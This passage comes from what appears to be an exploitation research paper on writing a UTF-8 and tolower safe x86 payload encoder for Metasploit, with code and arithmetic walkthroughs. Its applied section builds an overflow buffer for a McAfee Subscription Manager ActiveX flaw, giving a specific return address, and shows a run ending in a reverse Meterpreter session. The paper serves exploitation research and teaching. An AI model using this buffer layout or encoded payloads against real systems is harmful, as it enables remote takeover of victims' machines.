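printf("x=0x%02x y=0x%02x -> 0x%02x\n", x2, y2, low)   # x=0x18 y=0x3c -> 0x24
```

In both cases x and y stay at or below 0x7f, which is the property the
encoder needs.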
|
|
Given these two methods of calculating the individual byte values, it's
possible to encode all bytes with the exception of 0x7f, 0x80, and 0x81. If
any one of these three bytes is encountered, the try_sub routine will return
nil and the encoding will fail. Otherwise, the routine will complete in a
fashion similar to the try_add routine. However, rather than using an add
instruction, it uses the sub instruction.
|
|
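To see how the per-byte values combine into a full 32-bit subtraction, the
following sketch re-implements the split deterministically. It is an
illustration under stated assumptions rather than the encoder's actual code:
split_sub and ok? are hypothetical names, the first acceptable candidate is
chosen instead of a random one, and ok? stands in for is_badchar by accepting
only 0x01 through 0x7f and rejecting uppercase ASCII. The candidate ranges
mirror the ones in the listing, so the sketch returns nil whenever no
candidate in those ranges is acceptable.

```ruby
# Hypothetical stand-in for is_badchar: accept only 0x01-0x7f and reject
# uppercase ASCII. The real encoder consults the exploit's bad characters.
def ok?(v)
  v.between?(0x01, 0x7f) && !v.between?(0x41, 0x5a)
end

# Deterministic sketch of the try_sub split. Returns [x_bytes, y_bytes] such
# that the little-endian dword y minus the dword x equals the block, or nil
# if a byte cannot be encoded.
def split_sub(block)
  xs = []
  ys = []
  carry = 0
  block.each_byte do |b|
    return nil if [0x7f, 0x80, 0x81].include?(b)
    pair = nil
    if b > 0x80
      diff = 0x100 - b
      (1..(0x80 - diff - 1)).each do |y|
        x = 0x100 - (b - y + carry)
        if ok?(x) && ok?(y)
          pair = [x, y]
          break
        end
      end
      next_carry = 1   # y < x, so this byte borrows from the next one
    else
      diff = 0x7f - b
      (1..(diff - 1)).each do |x|
        y = (b + x + carry) & 0xff
        if ok?(x) && ok?(y)
          pair = [x, y]
          break
        end
      end
      next_carry = 0   # y >= x, so no borrow is generated
    end
    return nil if pair.nil?
    xs << pair[0]
    ys << pair[1]
    carry = next_carry
  end
  [xs, ys]
end

block = "\x24\x84\x10\xcc".b
xs, ys = split_sub(block)
x32 = xs.pack('C4').unpack1('V')
y32 = ys.pack('C4').unpack1('V')

# Model `sub [ecx], edi` on the whole dword.
decoded = [(y32 - x32) & 0xffffffff].pack('V')
puts decoded == block   # true
```

The third byte is the interesting one: it follows a byte above 0x80, so its y
value has to absorb the borrow that the previous byte generated.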
|
|
4.3) encode_end

With all the encoding cruft out of the way, the final method that needs to be
overridden is encode_end. In this method, the state.context attribute is
appended to state.encoded. The purpose of the state.context attribute is to
hold all of the encoded data blocks that are created over the course of
encoding each block. The state.encoded attribute is the actual decoder
including the stub header, the decode transformations, and finally, the
encoded data blocks.

def encode_end(state)
    state.encoded += state.context
end
|
|
|
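The effect of keeping the data blocks in a separate attribute until the very
end can be illustrated with a small stand-in. This is only a sketch: the State
struct below is hypothetical and models nothing but the two attributes
discussed above, and the strings are placeholders rather than real opcodes.

```ruby
# Hypothetical stand-in for the framework's encoder state object; only the
# two attributes discussed in the text are modeled.
State = Struct.new(:encoded, :context)

def encode_end(state)
  state.encoded += state.context
end

state = State.new(''.b, ''.b)
state.encoded += 'STUB'.b                  # placeholder for the stub header

[%w[T1 D1], %w[T2 D2]].each do |transform, data|
  state.encoded += transform.b             # placeholder decode transformation
  state.context += data.b                  # placeholder encoded data block
end

encode_end(state)
puts state.encoded    # STUBT1T2D1D2
```

All of the transformations end up contiguous and ahead of the data they
operate on, which is what allows the stub to compute a single offset to the
first data block.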
|
|
|
Once encoding completes, the result might be a disassembly that looks
something like this:

$ echo -ne "\x42\x20\x80\x78\xcc\xcc\xcc\xcc" | \
    ./msfencode -e x86/avoid_utf8_tolower -t raw | \
    ndisasm -u -
[*] x86/avoid_utf8_tolower succeeded, final size 47

00000000  6A02              push byte +0x2
00000002  6B3C240B          imul edi,[esp],byte +0xb
00000006  60                pusha
00000007  030C24            add ecx,[esp]
0000000A  6A11              push byte +0x11
0000000C  030C24            add ecx,[esp]
0000000F  6A04              push byte +0x4
00000011  683C0C190D        push dword 0xd190c3c
00000016  5F                pop edi
00000017  0139              add [ecx],edi
00000019  030C24            add ecx,[esp]
0000001C  68696A6060        push dword 0x60606a69
00000021  5F                pop edi
00000022  0139              add [ecx],edi
00000024  030C24            add ecx,[esp]
00000027  06                push es
00000028  1467              adc al,0x67
0000002A  6B63626C          imul esp,[ebx+0x62],byte +0x6c
0000002E  6C                insb
|
|
|
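The bytes from offset 0x27 onward in the disassembly above are not
instructions at all; they are the two encoded data blocks, which ndisasm
simply decodes as if they were code. As a quick sanity check, the sketch below
replays the arithmetic of the stub by hand, using only values that appear in
the listing. It assumes, as the stub does, that ecx holds the address of the
first stub byte on entry.

```ruby
# The payload that was fed to msfencode.
original = "\x42\x20\x80\x78\xcc\xcc\xcc\xcc".b

# push 2 / imul edi,[esp],0xb leaves 0x16 in edi, which pusha places on top
# of the stack for the first add ecx,[esp]. push 0x11 supplies the rest.
data_offset = 2 * 0x0b + 0x11

# The dwords pushed before each `add [ecx], edi`.
addends = [0x0d190c3c, 0x60606a69]

# The eight bytes that ndisasm shows at offsets 0x27 through 0x2e.
data = "\x06\x14\x67\x6b\x63\x62\x6c\x6c".b

# Apply each add to its little-endian data block.
decoded = data.unpack('V2').zip(addends).map { |blk, addend|
  (blk + addend) & 0xffffffff
}.pack('V2')

printf("data blocks start at 0x%02x\n", data_offset)   # 0x27
puts decoded.unpack1('H*')                              # 42208078cccccccc
```

The computed offset matches the position of the first data block in the
listing, and adding the pushed values restores the original eight bytes.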
|
|
|
5) Applying the Encoder

The whole reason that this encoder was originally needed was to take advantage
of the vulnerability in the McAfee Subscription Manager ActiveX control. Now
that the encoder has been implemented, all that's left is to try it out and
see if it works. To test this against a Windows XP SP0 target, the overflow
buffer might be constructed as follows.

First, a string of 2972 random text characters must be generated. The return
address should follow the random character string. An example of a valid
return address for this target is 0x7605122f, which is the location of a
jmp esp instruction in shell32.dll. Immediately following the return address
in the overflow buffer should be a series of five instructions:

00000000  60                pusha
00000001  6A01              push byte +0x1
00000003  6A01              push byte +0x1
00000005  6A01              push byte +0x1
00000007  61                popa

The purpose of this series of instructions is to cause the value of esp at the
time that the pusha occurs to be popped into the ecx register. As the reader
should recall, the ecx register is used as the base address for the decoder
stub. However, since esp doesn't actually point to the base address of the
decoder stub, the encoder must be informed that 8 extra bytes, the combined
size of the five instructions, must be added to ecx when accounting for the
extra offset into the encoded data blocks. This is conveyed by setting the
BufferOffset value to 8. After these five instructions should come the encoded
version of the payload. To better visualize this, consider the following
snippet from the exploit:
|
|
|
|
|
|
buf =
    Rex::Text.rand_text(2972, payload_badchars) +
    [ ret ].pack('V') +
    "\x60" +                                          # pusha
    "\x6a" + Rex::Text.rand_char(payload_badchars) +  # push byte <random>
    "\x6a" + Rex::Text.rand_char(payload_badchars) +  # push byte <random>
    "\x6a" + Rex::Text.rand_char(payload_badchars) +  # push byte <random>
    "\x61" +                                          # popa
    p.encoded
|
|
|
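The register shuffle performed by the pusha, push, and popa sequence is easy
to get wrong, so a small model may help. The sketch below is an illustration
only: the register values and the stack address are arbitrary placeholders,
and it assumes that esp points at the first byte following the return address
when the jmp esp executes, so that esp equals the address of the pusha
instruction itself.

```ruby
# Minimal model of the stack effects of pusha, push imm8, and popa.
# Register values are arbitrary placeholders; only esp matters here.
regs  = { eax: 1, ecx: 2, edx: 3, ebx: 4, esp: 0x0012f000,
          ebp: 6, esi: 7, edi: 8 }
stack = {}                                 # address => dword

push = lambda do |value|
  regs[:esp] -= 4
  stack[regs[:esp]] = value
end

pop = lambda do
  value = stack.delete(regs[:esp])
  regs[:esp] += 4
  value
end

# Assumption: after jmp esp, esp is the address of the pusha instruction.
stub_start = regs[:esp]

# pusha: pushes eax, ecx, edx, ebx, the original esp, ebp, esi, edi.
saved_esp = regs[:esp]
[regs[:eax], regs[:ecx], regs[:edx], regs[:ebx], saved_esp,
 regs[:ebp], regs[:esi], regs[:edi]].each { |v| push.call(v) }

# Three push byte instructions shift the frame by three dwords.
3.times { push.call(0x01) }

# popa: pops edi, esi, ebp, skips the esp slot, then ebx, edx, ecx, eax.
[:edi, :esi, :ebp, nil, :ebx, :edx, :ecx, :eax].each do |reg|
  value = pop.call
  regs[reg] = value if reg
end

# The five instructions occupy 8 bytes, hence BufferOffset = 8.
prefix_size   = ("\x60" + "\x6a\x01" * 3 + "\x61").bytesize
decoder_start = regs[:ecx] + prefix_size

printf("ecx = 0x%08x, decoder stub at 0x%08x\n", regs[:ecx], decoder_start)
```

Because the three pushed dwords displace the saved registers by three slots,
the slot that held the original esp lines up with ecx when popa executes.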
|
|
|
With the overflow buffer ready to go, the only thing left to do is fire off an
exploit attempt by having the machine browse to the malicious website:

msf exploit(mcafee_mcsubmgr_vsprintf) > exploit
[*] Started reverse handler
[*] Using URL: http://x.x.x.3:8080/foo
[*] Server started.
[*] Exploit running as background job.
msf exploit(mcafee_mcsubmgr_vsprintf) >
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (73739 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (x.x.x.3:4444 -> x.x.x.105:2010)

msf exploit(mcafee_mcsubmgr_vsprintf) > sessions -i 1
[*] Starting interaction with 1...

meterpreter >
|
|
|
|
|
|
6) Conclusion

The purpose of this paper was to illustrate the process of implementing a
custom encoder for the x86 architecture. In particular, the encoder described
in this paper was designed to make it possible to encode payloads in a UTF-8
and tolower safe format. To help illustrate the usefulness of such an encoder,
a recent vulnerability in the McAfee Subscription Manager ActiveX control was
used because of its restrictions on uppercase characters. While many readers
may never find it necessary to implement an encoder, it's nevertheless a
worthwhile topic to understand for those who are interested in exploitation
research.
|
|
|
|
|
|
A. References

eEye. McAfee Subscription Manager Stack Buffer Overflow.
http://lists.grok.org.uk/pipermail/full-disclosure/2006-August/048565.html;
accessed Aug 26, 2006.

Metasploit Staff. Metasploit 3.0 Developer's Guide.
http://www.metasploit.com/projects/Framework/msf3/developers_guide.pdf;
accessed Aug 26, 2006.

Spoonm. Recent Shellcode Developments.
http://www.metasploit.com/confs/recon2005/recent_shellcode_developments-recon05.pdf;
accessed Aug 26, 2006.
|
|
|
|
|
|
SkyLined. Alpha 2.
http://www.edup.tudelft.nl/~bjwever/documentation_alpha2.html.php;
accessed Aug 26, 2006.